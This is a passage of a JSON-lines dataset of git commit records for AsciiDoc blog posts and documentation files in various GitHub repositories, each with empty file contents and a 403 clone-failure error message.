2015-11-10-Evolve.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2015-11-10-Evolve.adoc","new_file":"_posts\/2015-11-10-Evolve.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"544e70e8af43d46af8e949f522c6bb88986f1d78","subject":"Delete 2017-08-23-Kotlin.adoc","message":"Delete 2017-08-23-Kotlin.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-23-Kotlin.adoc","new_file":"_posts\/2017-08-23-Kotlin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"009f669b3f29758f05fbdeb1879ff5f426871384","subject":"Update 2018-07-08-Gohttp.adoc","message":"Update 2018-07-08-Gohttp.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-08-Gohttp.adoc","new_file":"_posts\/2018-07-08-Gohttp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52dba2f65ac89bc6a97381b0a0e44f0ce83352b8","subject":"Update 2015-03-15-HubPress.adoc","message":"Update 2015-03-15-HubPress.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2015-03-15-HubPress.adoc","new_file":"_posts\/2015-03-15-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2662eaedd1c11e6e69fe77fb233032c6d6d8585","subject":"Update 2016-04-17-S-S-H.adoc","message":"Update 2016-04-17-S-S-H.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2016-04-17-S-S-H.adoc","new_file":"_posts\/2016-04-17-S-S-H.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KozytyPress\/kozytypress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e6255f0d89df219dc9465424f4cb52610c0d159","subject":"Update 2016-10-11-New-Page.adoc","message":"Update 2016-10-11-New-Page.adoc","repos":"pallewela\/pallewela.github.io,pallewela\/pallewela.github.io,pallewela\/pallewela.github.io,pallewela\/pallewela.github.io","old_file":"_posts\/2016-10-11-New-Page.adoc","new_file":"_posts\/2016-10-11-New-Page.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pallewela\/pallewela.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c7ef89a44df80766e1d57a80a561f3ea0e5df3a","subject":"Update 2016-12-18-About-Me.adoc","message":"Update 2016-12-18-About-Me.adoc","repos":"chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io","old_file":"_posts\/2016-12-18-About-Me.adoc","new_file":"_posts\/2016-12-18-About-Me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chowwin\/chowwin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc69e3ed695757a8ae6babe10abeaba220619685","subject":"Update 2017-08-16-My-Issue-with-this-Project-and-How-I-Plan-on-Fixing-It.adoc","message":"Update 2017-08-16-My-Issue-with-this-Project-and-How-I-Plan-on-Fixing-It.adoc","repos":"ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io","old_file":"_posts\/2017-08-16-My-Issue-with-this-Project-and-How-I-Plan-on-Fixing-It.adoc","new_file":"_posts\/2017-08-16-My-Issue-with-this-Project-and-How-I-Plan-on-Fixing-It.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ashelle\/ashelle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de8061c177fe8196f0c5d547b89a3d153a046d59","subject":"Add some meat to the developing chapter, more details about the examples repo","message":"Add some meat to the developing chapter, more details about the examples repo\n\nChange-Id: I03682e83a3d939d5b7ac02fd7eed1ec22d8862c6\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/7918\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\nTested-by: jenkins\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu","old_file":"docs\/developing.adoc","new_file":"docs\/developing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"22d4c290e71fde4f249676c5608be691c2ab113b","subject":"Update Yubikey_and_SSH_via_PAM.adoc","message":"Update Yubikey_and_SSH_via_PAM.adoc","repos":"eworm-de\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,madrat-\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam","old_file":"doc\/Yubikey_and_SSH_via_PAM.adoc","new_file":"doc\/Yubikey_and_SSH_via_PAM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d3fc3eca9eedd9aeb2817e8ac013453dfd2e5d14","subject":"Create set-up-kb-using-kaui.adoc","message":"Create set-up-kb-using-kaui.adoc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/getting-started\/set-up-kb-using-kaui.adoc","new_file":"userguide\/getting-started\/set-up-kb-using-kaui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"364ff1f584121ab741442ea09a6c9d71e46ff4a6","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a1a36ab83b53e5a6b6ae1c7759db46449d5c528","subject":"Update 2016-12-2-three-dimensional-pen-of-dream.adoc","message":"Update 2016-12-2-three-dimensional-pen-of-dream.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-three-dimensional-pen-of-dream.adoc","new_file":"_posts\/2016-12-2-three-dimensional-pen-of-dream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"413e582fd3524335bcf6e73d93dac346149d9130","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75b6c0e9b61b03e7c151e1308ca5004942ab159c","subject":"Update 2019-10-03-Taming-Terraform-with-Modules.adoc","message":"Update 2019-10-03-Taming-Terraform-with-Modules.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2019-10-03-Taming-Terraform-with-Modules.adoc","new_file":"_posts\/2019-10-03-Taming-Terraform-with-Modules.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"900079c8b8e3217aa3c35179b1551f0182dd2674","subject":"Update 2016-02-22-Our-thoughts-on-Wonderful-World-of-Disney-Disneyland-60.adoc","message":"Update 2016-02-22-Our-thoughts-on-Wonderful-World-of-Disney-Disneyland-60.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-22-Our-thoughts-on-Wonderful-World-of-Disney-Disneyland-60.adoc","new_file":"_posts\/2016-02-22-Our-thoughts-on-Wonderful-World-of-Disney-Disneyland-60.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83584a2c9cb8a96bedf7bc7e37307f261587d3cd","subject":"Renamed '_posts\/2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-on-Ubuntu.adoc' to '_posts\/2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-Ubuntu-package.adoc'","message":"Renamed '_posts\/2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-on-Ubuntu.adoc' to '_posts\/2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-Ubuntu-package.adoc'","repos":"nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io","old_file":"_posts\/2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-Ubuntu-package.adoc","new_file":"_posts\/2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-Ubuntu-package.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nnn-dev\/nnn-dev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89c9f622ac3df3c6c42f0ecdfb2f3645425ba8a2","subject":"Updated to address point (a) of Heiko's comments - but will leave (b) as it is explained in text","message":"Updated to address point (a) of Heiko's comments - but will leave (b) as it is explained in text\n","repos":"tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/05\/26\/hawkular-btm-booker-demo.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/05\/26\/hawkular-btm-booker-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"02245ff7b6c12eb4cf05a82c09da68d6f7280051","subject":"Update 2016-04-21-Story-became-engineers-become-a-member-of-society-I-was-inexperienced.adoc","message":"Update 2016-04-21-Story-became-engineers-become-a-member-of-society-I-was-inexperienced.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-21-Story-became-engineers-become-a-member-of-society-I-was-inexperienced.adoc","new_file":"_posts\/2016-04-21-Story-became-engineers-become-a-member-of-society-I-was-inexperienced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15b1adae9d5d38c6c94ebfcb3470c05083c4f9a2","subject":"Create GettingStartedTutorial.adoc","message":"Create GettingStartedTutorial.adoc","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/GettingStartedTutorial.adoc","new_file":"doc\/GettingStartedTutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d9bc9dbc3ffe7b46f3891e3cf0dd23adcf4ea335","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d7a025948816088549a67c0d6cb94bc39ea24fb","subject":"Update 2017-06-18-El-apego-al-capital-como-obstaculo-para-crecer-Mas-Prospero-13.adoc","message":"Update 2017-06-18-El-apego-al-capital-como-obstaculo-para-crecer-Mas-Prospero-13.adoc","repos":"elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind","old_file":"_posts\/2017-06-18-El-apego-al-capital-como-obstaculo-para-crecer-Mas-Prospero-13.adoc","new_file":"_posts\/2017-06-18-El-apego-al-capital-como-obstaculo-para-crecer-Mas-Prospero-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elidiazgt\/mind.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbd8a6fd23183b59bddef0c5938fee88b184a47f","subject":"2016-07-10-huh.adoc","message":"2016-07-10-huh.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-10-huh.adoc","new_file":"_posts\/2016-07-10-huh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4111a4dd4d7baf810dac072aecb4b0ce1f7e4c0","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba8c9a364f9cafd40d67bc31d2ad62dc8343dbfd","subject":"Update 2015-11-11-Making-an-internet-radio-with-a-Banana-Pi-and-cheaper-components.adoc","message":"Update 2015-11-11-Making-an-internet-radio-with-a-Banana-Pi-and-cheaper-components.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2015-11-11-Making-an-internet-radio-with-a-Banana-Pi-and-cheaper-components.adoc","new_file":"_posts\/2015-11-11-Making-an-internet-radio-with-a-Banana-Pi-and-cheaper-components.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0cae800dd54e193e5d9db4e37fb278f9146cca8a","subject":"y2b create post The New High Tech Corvette! (Corvette Performance Recorder - CES 2014)","message":"y2b create post The New High Tech Corvette! (Corvette Performance Recorder - CES 2014)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-01-06-The-New-High-Tech-Corvette-Corvette-Performance-Recorder--CES-2014.adoc","new_file":"_posts\/2014-01-06-The-New-High-Tech-Corvette-Corvette-Performance-Recorder--CES-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7fa9f08dc92051b893814231b3ae519ed356672","subject":"Deleted 2016-6-26-first-title.adoc","message":"Deleted 2016-6-26-first-title.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-first-title.adoc","new_file":"2016-6-26-first-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d8156e795d8af88560ccd6e8a572194ef5ca543","subject":"Publish 20161110-test-post.adoc","message":"Publish 20161110-test-post.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-test-post.adoc","new_file":"20161110-test-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3dbbd33eda5b0ebb92fbf2fdcc55591a614fe36b","subject":"Update 2015-04-22-Handy-Utils-for-fabric8.adoc","message":"Update 2015-04-22-Handy-Utils-for-fabric8.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-04-22-Handy-Utils-for-fabric8.adoc","new_file":"_posts\/2015-04-22-Handy-Utils-for-fabric8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed7babeed07f65bf4118f2bc4c8fb286a425a32d","subject":"Update 2016-10-04-CentOS-7-FirewallD-simple-description-and-links.adoc","message":"Update 2016-10-04-CentOS-7-FirewallD-simple-description-and-links.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-10-04-CentOS-7-FirewallD-simple-description-and-links.adoc","new_file":"_posts\/2016-10-04-CentOS-7-FirewallD-simple-description-and-links.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08832e7e64f11b80bfa729560210472edde869a6","subject":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","message":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c4af0b1ef76114c0144e8de11b27d1d6d86243f","subject":"Update 2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae39e1a48ca1a8525d50c958087b7872124d0255","subject":"Publish 20161110-1232-showoff-zone-owo.adoc","message":"Publish 20161110-1232-showoff-zone-owo.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1232-showoff-zone-owo.adoc","new_file":"20161110-1232-showoff-zone-owo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46a886cd22e86d3fdfee62aa6115054138db3a33","subject":"[kudu-jepsen] added more info on troubleshooting","message":"[kudu-jepsen] added more info on troubleshooting\n\nAdded more information on distinguishing 'errors' from 'failures' in the\nkudu-jepsen test output.\n\nChange-Id: I9b97b744d969b73ede2fcb7a3509915b130c655b\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/6774\nTested-by: Kudu Jenkins\nReviewed-by: David Ribeiro Alves <dbbafdb4f25eb0c1ff3facf0e5f2f27705055af1@gmail.com>\n","repos":"EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu","old_file":"java\/kudu-jepsen\/README.adoc","new_file":"java\/kudu-jepsen\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0d3be35397500d91648fc0961093ff21b3ad916b","subject":"Update 2015-08-30-I-suspect-that-Im-Happy.adoc","message":"Update 2015-08-30-I-suspect-that-Im-Happy.adoc","repos":"extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io","old_file":"_posts\/2015-08-30-I-suspect-that-Im-Happy.adoc","new_file":"_posts\/2015-08-30-I-suspect-that-Im-Happy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/extrapolate\/extrapolate.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f233aa3491e268211c67ec811a6332c817f3fb80","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d0a1119359134b1f6a70eef2531a9525329c2e2","subject":"y2b create post A Very Unusual Keyboard...","message":"y2b create post A Very Unusual Keyboard...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-19-A-Very-Unusual-Keyboard.adoc","new_file":"_posts\/2017-03-19-A-Very-Unusual-Keyboard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc2943f77690d0dc8e8367c43f14849dd1a4d37b","subject":"Update 2018-01-01-Open-source-smart-watch.adoc","message":"Update 2018-01-01-Open-source-smart-watch.adoc","repos":"kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io","old_file":"_posts\/2018-01-01-Open-source-smart-watch.adoc","new_file":"_posts\/2018-01-01-Open-source-smart-watch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kr-b\/kr-b.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6cc9c5683a3b5787cfb003f89c909ba76b57bd8","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81e282e52b30029ce6a2a951bd6a07939019d074","subject":"Renamed '_posts\/2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc' to '_posts\/2017-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc'","message":"Renamed '_posts\/2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc' to 